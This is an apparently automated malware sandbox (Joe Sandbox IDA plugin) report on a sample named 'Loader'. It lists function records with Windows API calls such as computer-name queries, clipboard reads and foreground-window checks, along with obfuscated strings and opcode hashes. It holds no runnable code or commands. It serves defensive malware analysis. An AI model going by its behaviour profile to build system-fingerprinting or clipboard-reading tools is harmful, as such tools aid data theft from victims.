                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ComputerFreeLibraryName
                                                                                        • String ID: #v
                                                                                        • API String ID: 2904949787-554117064
                                                                                        • Opcode ID: 6620cd2dd9454d8305604dc0a295b7f92df86d05da90940a768b1fd21d37aead
                                                                                        • Instruction ID: b0442a1b6006627bfac749667bf69648ea68c72265edfd0c76de215cb43adc1f
                                                                                        • Opcode Fuzzy Hash: 6620cd2dd9454d8305604dc0a295b7f92df86d05da90940a768b1fd21d37aead
                                                                                        • Instruction Fuzzy Hash: 6A21F8352683918FD721DB35DC107EBBBE6EB9A314F99492ED1C9C7252DB7488028781
                                                                                        APIs
                                                                                        • GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042BFEB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ComputerName
                                                                                        • String ID: Jk
                                                                                        • API String ID: 3545744682-2435780000
                                                                                        • Opcode ID: e11f0280e5fc73940bd43accc5bac76100360abbb9ea086e8515174c2a2be390
                                                                                        • Instruction ID: f8b6963ffdad34389f8e41c28869e3d9660b03a655e2583e95d8d3bda7f56e74
                                                                                        • Opcode Fuzzy Hash: e11f0280e5fc73940bd43accc5bac76100360abbb9ea086e8515174c2a2be390
                                                                                        • Instruction Fuzzy Hash: 9221253550C7904ADB32CB3998647EBBBE09F97304F094A6DC4DDC7286DB384405CB96
                                                                                        APIs
                                                                                        • GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042BFEB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ComputerName
                                                                                        • String ID: Jk
                                                                                        • API String ID: 3545744682-2435780000
                                                                                        • Opcode ID: 7025246bb4045d934add9299956edf933fbae908dc2bfb3c0eeb9ab801584232
                                                                                        • Instruction ID: 1eb15b467228e91927b88c1530aa4184b94cdc4fa3224a7153598cd3ef29f343
                                                                                        • Opcode Fuzzy Hash: 7025246bb4045d934add9299956edf933fbae908dc2bfb3c0eeb9ab801584232
                                                                                        • Instruction Fuzzy Hash: 85113036608B904BDB31CB389C287EBBBD09F96310F194B2DC4DDC7295EB3848018B92
                                                                                        APIs
                                                                                        • GetUserDefaultUILanguage.KERNELBASE ref: 00436A65
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: DefaultLanguageUser
                                                                                        • String ID: u
                                                                                        • API String ID: 95929093-4067256894
                                                                                        • Opcode ID: 3484c23c7cdde163382f8b5677bb3c5e64803b511a88fc23218b33cef870498d
                                                                                        • Instruction ID: f3c22d90c568ecaed0f3cc6f16dafd322a7d18ae38fc015f3be8ab71a63a4f26
                                                                                        • Opcode Fuzzy Hash: 3484c23c7cdde163382f8b5677bb3c5e64803b511a88fc23218b33cef870498d
                                                                                        • Instruction Fuzzy Hash: 29010434C082929FCF119F78C9403EE7FA16F1B310F1986A9C4D567386D7398A058B96
                                                                                        APIs
                                                                                        • CoInitializeEx.OLE32(00000000,00000002), ref: 0040CADA
                                                                                        • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CC22
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: Initialize
                                                                                        • String ID:
                                                                                        • API String ID: 2538663250-0
                                                                                        • Opcode ID: 473d84c0bd29ceff853ded9ea3310dfdb5f52dcc193ba7537c9131df9544d089
                                                                                        • Instruction ID: a48d5ef0adb5250571e8a41bd9df73004e022a6934e4612084ba1943594d6038
                                                                                        • Opcode Fuzzy Hash: 473d84c0bd29ceff853ded9ea3310dfdb5f52dcc193ba7537c9131df9544d089
                                                                                        • Instruction Fuzzy Hash: A741E4B4D10B00AFD370EF39DA4B7127EB4AB05250F404B2DF9EA866D4E631A4198BD7
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32 ref: 0043E9A1
                                                                                        • GetForegroundWindow.USER32 ref: 0043E9B3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ForegroundWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2020703349-0
                                                                                        • Opcode ID: 0dea34fee18d2d4d34ccc8698138f7830839b94345d1193dcb1cea91282bf9ce
                                                                                        • Instruction ID: 1f1a92c4ed7c3cabed4fabd3d678f137bf463a9ca5e289bc5fa2f09bb69a997d
                                                                                        • Opcode Fuzzy Hash: 0dea34fee18d2d4d34ccc8698138f7830839b94345d1193dcb1cea91282bf9ce
                                                                                        • Instruction Fuzzy Hash: B7D012B9C000068BDF44DFA0FC8D44E7769BE46619F045035E40343122E93495068B4D
                                                                                        APIs
                                                                                        • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042BEC6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ComputerName
                                                                                        • String ID:
                                                                                        • API String ID: 3545744682-0
                                                                                        • Opcode ID: cd2bccd2bec2de7f05dfec0e84612135ab30a4b4d834837766c462715e607512
                                                                                        • Instruction ID: 2ec592fbdc78758a6a3c226a3e8484dbb67dbcc7126bdc08d1755178837746e5
                                                                                        • Opcode Fuzzy Hash: cd2bccd2bec2de7f05dfec0e84612135ab30a4b4d834837766c462715e607512
                                                                                        • Instruction Fuzzy Hash: 472129352283918FD720DB35DC107EBBBE5EB9A324F994C2EC1C8C7252DB7488028781
                                                                                        APIs
                                                                                        • RtlReAllocateHeap.NTDLL(?,00000000,00439407,00A76950,00000000,00A76950,00439407,00000000,00004000,?,?,?,?,00000001,00A76950,000001EB), ref: 0043D9C2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: 084470b7baac391b38589efddef063322e1089dcf71c2679d93c93680cd862d0
                                                                                        • Instruction ID: b8b631638b18798679597f3341c455e23d05a83346a63bcdeeebd9bf56da5e38
                                                                                        • Opcode Fuzzy Hash: 084470b7baac391b38589efddef063322e1089dcf71c2679d93c93680cd862d0
                                                                                        • Instruction Fuzzy Hash: EFF0277A8582A0FBC6116F25BC02A9B3664EF8F315F01147BF401A6121DB3ADC06D6DF
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: BlanketProxy
                                                                                        • String ID:
                                                                                        • API String ID: 3890896728-0
                                                                                        • Opcode ID: e533b8d7a54d8a619334615e694dd05766154279aca62bc1f98a219380d37df7
                                                                                        • Instruction ID: 24518978adee5ca75fa83efdf11994bb0dab04cffabc163f3a89706635ba24a8
                                                                                        • Opcode Fuzzy Hash: e533b8d7a54d8a619334615e694dd05766154279aca62bc1f98a219380d37df7
                                                                                        • Instruction Fuzzy Hash: 92F0A4B45093518FE321DF25D56974FBBE4BB88348F11891CE8945B291C7B99A488FC2
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: BlanketProxy
                                                                                        • String ID:
                                                                                        • API String ID: 3890896728-0
                                                                                        • Opcode ID: f6c407c80fc0f7406bccacefba9cb4fe8356fce67e48fbcb250bc6c4a1960068
                                                                                        • Instruction ID: a6a0066e54c7d049ab9ba52ee2f517c0d060c6457a62882aa2ba7396dcee3bc7
                                                                                        • Opcode Fuzzy Hash: f6c407c80fc0f7406bccacefba9cb4fe8356fce67e48fbcb250bc6c4a1960068
                                                                                        • Instruction Fuzzy Hash: 2CF07AB45087018FD354DF25D5A875BBBE0FB85304F00881DE5D68B290DBB59A48CF86
                                                                                        APIs
                                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CC79
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeSecurity
                                                                                        • String ID:
                                                                                        • API String ID: 640775948-0
                                                                                        • Opcode ID: f26f7e794f68f0bb5a99fe30ccc7342a53b7d5a4afcd2a31ad992c16831d56de
                                                                                        • Instruction ID: 2b78fd6e66c85e2770e1fedaeca4d467f1847f566c0c49e5f6124588b814a6a2
                                                                                        • Opcode Fuzzy Hash: f26f7e794f68f0bb5a99fe30ccc7342a53b7d5a4afcd2a31ad992c16831d56de
                                                                                        • Instruction Fuzzy Hash: C6D092353D83417BF9645B08AD53F1072509746F16F310624B323FE2E5C9906501860C
                                                                                        APIs
                                                                                        • RtlFreeHeap.NTDLL(?,00000000,00000000,004146B4,00000000), ref: 0043BD60
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeHeap
                                                                                        • String ID:
                                                                                        • API String ID: 3298025750-0
                                                                                        • Opcode ID: 8b36816211867e107b1c33e8a36d1a93761f9aace37de06867b51b3c08574d90
                                                                                        • Instruction ID: f90848bae3256b06cf5094926935a10db3a74c04a44cfe7e493f6f0e12b6a334
                                                                                        • Opcode Fuzzy Hash: 8b36816211867e107b1c33e8a36d1a93761f9aace37de06867b51b3c08574d90
                                                                                        • Instruction Fuzzy Hash: 85D0C931465622EBC6146F18BC15BC73A54DF4A361F0708A2F4006A475C675DC91DAE8
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(?,00000000,00408638,?,00408638), ref: 0043BD30
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: cf65f95657680e7bc98513e43210a7ecff9104acca7fedf48e906d763921924d
                                                                                        • Instruction ID: 2c7a29268eac836babc22c216ba9330a039660881ad4ae188c8b4a1fbc13fc40
                                                                                        • Opcode Fuzzy Hash: cf65f95657680e7bc98513e43210a7ecff9104acca7fedf48e906d763921924d
                                                                                        • Instruction Fuzzy Hash: 40C09B31455321EBC6106B15FC05FC77F54DF49751F1140A6B00477072C771AC41C6D8
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                        • String ID: Q$]$e$j$q$x
                                                                                        • API String ID: 2832541153-692368135
                                                                                        • Opcode ID: cd7ee1b0d44008d18f148219d93ad27284650de1e218d48dcbd18ce31904f4f5
                                                                                        • Instruction ID: 6f1dbd0e63c0454490a30a8cba9f540b8e981e08c188719af7d206ff943662a7
                                                                                        • Opcode Fuzzy Hash: cd7ee1b0d44008d18f148219d93ad27284650de1e218d48dcbd18ce31904f4f5
                                                                                        • Instruction Fuzzy Hash: 9B41927150C7418ED310AF78988935FBFE0AB9A315F044A3EE4D5873D2D6788649C75B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: o;i$#C(]$1G#A$3SQm$KJIH$rqB$xlc=
                                                                                        • API String ID: 0-4225912290
                                                                                        • Opcode ID: b291a350f7d21ee5a1b80931a86ef7cb954b4aa59bf97fddcf800b527b295b08
                                                                                        • Instruction ID: 99384cb80079416eac910717a9e1d0dd8795ebf962f0defd3915704c1b902f09
                                                                                        • Opcode Fuzzy Hash: b291a350f7d21ee5a1b80931a86ef7cb954b4aa59bf97fddcf800b527b295b08
                                                                                        • Instruction Fuzzy Hash: 06914876A0C3248BC320DF64E88165FB7E1EBC9704F59493EE98997341DB74AD058BCA
                                                                                        APIs
                                                                                          • Part of subcall function 0043DA10: LdrInitializeThunk.NTDLL(00440D9D,00000002,00000018,?,?,00000018,?,?,?), ref: 0043DA3E
                                                                                        • FreeLibrary.KERNEL32(?), ref: 00419706
                                                                                        • FreeLibrary.KERNEL32(?), ref: 0041976B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary$InitializeThunk
                                                                                        • String ID: 056w$HS$X{$wB$#v
                                                                                        • API String ID: 764372645-92669455
                                                                                        • Opcode ID: a444461b27d80ad657000d898751c9d626c695014427ae98d874af7b6ceb9ac3
                                                                                        • Instruction ID: 5228fd0e467c720768e27c90b66e3c9c54d982958b1791ede40bd78fdaf92bff
                                                                                        • Opcode Fuzzy Hash: a444461b27d80ad657000d898751c9d626c695014427ae98d874af7b6ceb9ac3
                                                                                        • Instruction Fuzzy Hash: B0821B746483406BE724CF24D8A076BBBE1EBD6714F28892DE0D5473A1D379DC82CB5A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "t$"t
                                                                                        • API String ID: 0-1451024413
                                                                                        • Opcode ID: db70b6725760ee1e7b0c82764c85399648d13b1201e1b058b4d747cb3a019c3f
                                                                                        • Instruction ID: b4c3dd1bf09823f08aeb12bbd8437f8bff72997974d1d928771d8ded679ca4a1
                                                                                        • Opcode Fuzzy Hash: db70b6725760ee1e7b0c82764c85399648d13b1201e1b058b4d747cb3a019c3f
                                                                                        • Instruction Fuzzy Hash: DF023B71E012199BDB14CFA9DA84BAEBBF1FF48314F15826DD515B7341D732A902CB90
                                                                                        APIs
                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00418272
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentExpandStrings
                                                                                        • String ID: <9$L$o
                                                                                        • API String ID: 237503144-3122339205
                                                                                        • Opcode ID: f91f0f8c20f7ac1f881b57f9819e89f26c0b09be35d7c1beb1e8172666532097
                                                                                        • Instruction ID: 38d06cfc946e2d634f33bc898b8b3081b8a665a97a1976fa3bc9cb3ab81d6238
                                                                                        • Opcode Fuzzy Hash: f91f0f8c20f7ac1f881b57f9819e89f26c0b09be35d7c1beb1e8172666532097
                                                                                        • Instruction Fuzzy Hash: F6E14B756083528BD320CF29D8D07ABB7E1EF99324F188A3DE4C487391EB789945CB56
                                                                                        APIs
                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,59195F3A,00000000,00000000,?), ref: 004181F4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentExpandStrings
                                                                                        • String ID: M+O$!C-M$7imJ$}Y*[$qWs
                                                                                        • API String ID: 237503144-2509796657
                                                                                        • Opcode ID: 47ed97315e110507114ef7b549b792d0a16ca60f33f0bbd43ba62459c0688936
                                                                                        • Instruction ID: 249fc3654da106cc027156d5fad6694f65c71858bdaf82a4f9d6bcb215be2f5f
                                                                                        • Opcode Fuzzy Hash: 47ed97315e110507114ef7b549b792d0a16ca60f33f0bbd43ba62459c0688936
                                                                                        • Instruction Fuzzy Hash: 3F9116716183128BC324CF14C4916BBB7F1EFC9764F199A1EE5CA5B361E7389881C74A
                                                                                        APIs
                                                                                          • Part of subcall function 00ECAFB3: GetLastError.KERNEL32(00000000,?,00ECD392,?,?,?,00000000), ref: 00ECAFB7
                                                                                          • Part of subcall function 00ECAFB3: SetLastError.KERNEL32(00000000,?,?,?,00000000,?,FFFFFFFF,000000FF,?,?,?,00000000), ref: 00ECB059
                                                                                        • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00ED016A
                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 00ED01A8
                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 00ED01BB
                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00ED0203
                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00ED021E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                        • String ID: `/
                                                                                        • API String ID: 415426439-3547518435
                                                                                        • Opcode ID: 2ff4dfa057c28536daa41cbf22eaa9fe3649a490d9f03648220dc6dde5ac8d6f
                                                                                        • Instruction ID: 148a8f32efa4d5867bbaf36c30e5e925a99ca7aa07c952a1d3623a04d7f5ca7d
                                                                                        • Opcode Fuzzy Hash: 2ff4dfa057c28536daa41cbf22eaa9fe3649a490d9f03648220dc6dde5ac8d6f
                                                                                        • Instruction Fuzzy Hash: 64517071A01209AFDB10DFA5DC45BBA77F8EF54714F08142AF905FB2A1E7B0DA068B61
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: #z*>$KJIH$M`af$M`af$TU$hi$xlc=
                                                                                        • API String ID: 0-3444116175
                                                                                        • Opcode ID: c0baef34677e044ab247d2e5aac73f80a096439048c6999c4bcee056cd6db3af
                                                                                        • Instruction ID: 7e836b9766b242f3fc3dd51180be0f2cab443d7991a9e66097dbc5a85011b6e9
                                                                                        • Opcode Fuzzy Hash: c0baef34677e044ab247d2e5aac73f80a096439048c6999c4bcee056cd6db3af
                                                                                        • Instruction Fuzzy Hash: 0BD14775609321CBC3149F18D85166FB3F1EF86314F444A2DF9D69B3A0EB789905CB8A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: #z*>$KJIH$M`af$M`af$TU$hi$xlc=
                                                                                        • API String ID: 0-3444116175
                                                                                        • Opcode ID: 8636f7f2d492a3864e0f02ebe2bf5754de26b4778162c7e19092fcca7101ddf1
                                                                                        • Instruction ID: f976bc588ec640565c7012468651d5ffc8b69fa3d08ac8f64f271550ea2c12cc
                                                                                        • Opcode Fuzzy Hash: 8636f7f2d492a3864e0f02ebe2bf5754de26b4778162c7e19092fcca7101ddf1
                                                                                        • Instruction Fuzzy Hash: ADD13675609321CBC3149F18D85266FB3F1EF86314F444A2DF9D69B3A0EB789905CB8A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: KJIH$KJIH$xlc=$xlc=$xlc=$tz$x~
                                                                                        • API String ID: 0-1340891752
                                                                                        • Opcode ID: 63b6a7e1f9943a7ee3fba3336e57c65c80b2210d8cee09f5dd92498206add450
                                                                                        • Instruction ID: 4b9b57266fa6f88c6c86b47bd8eb3fb309f79ef555365d41f88ab1d7a07e1ec3
                                                                                        • Opcode Fuzzy Hash: 63b6a7e1f9943a7ee3fba3336e57c65c80b2210d8cee09f5dd92498206add450
                                                                                        • Instruction Fuzzy Hash: 77F16579A0C350DFD3248F55E88172BBBE1FBCA314F95482DEA859B351D7749802CB8A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: BC$DTS^$SDTB$WLTO$no$sNDW$xlc=
                                                                                        • API String ID: 0-4261215005
                                                                                        • Opcode ID: ccdc102990b4c15d3359c4579d9af196d84240e8b5d2da791b71984c89447364
                                                                                        • Instruction ID: bc51c2f3923f1d1749b79aa7f72e467a3002caf565e53d3967ace05a6b2d116c
                                                                                        • Opcode Fuzzy Hash: ccdc102990b4c15d3359c4579d9af196d84240e8b5d2da791b71984c89447364
                                                                                        • Instruction Fuzzy Hash: F3D1F0B5A0C3908FD7309F24E8917ABB7F1EB96304F45482DE5C99B252DB748905CB8B
                                                                                        APIs
                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 00429149
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentExpandStrings
                                                                                        • String ID: zPf?$~Pf?
                                                                                        • API String ID: 237503144-2637493059
                                                                                        • Opcode ID: 26d119dec0a38fc1d7c433e7bb48d8e841ee7a0981e4bddc7203521b33e83297
                                                                                        • Instruction ID: 198dd5e36b7fe1fa964ce911b4fb16a36b701d1aa9f0cceef3b71a0ea0f726ca
                                                                                        • Opcode Fuzzy Hash: 26d119dec0a38fc1d7c433e7bb48d8e841ee7a0981e4bddc7203521b33e83297
                                                                                        • Instruction Fuzzy Hash: EB514675648305EFE3108F25AC81B6BB7A8FBC2704F50193DFA509B291DBB4D81ACB56
                                                                                        APIs
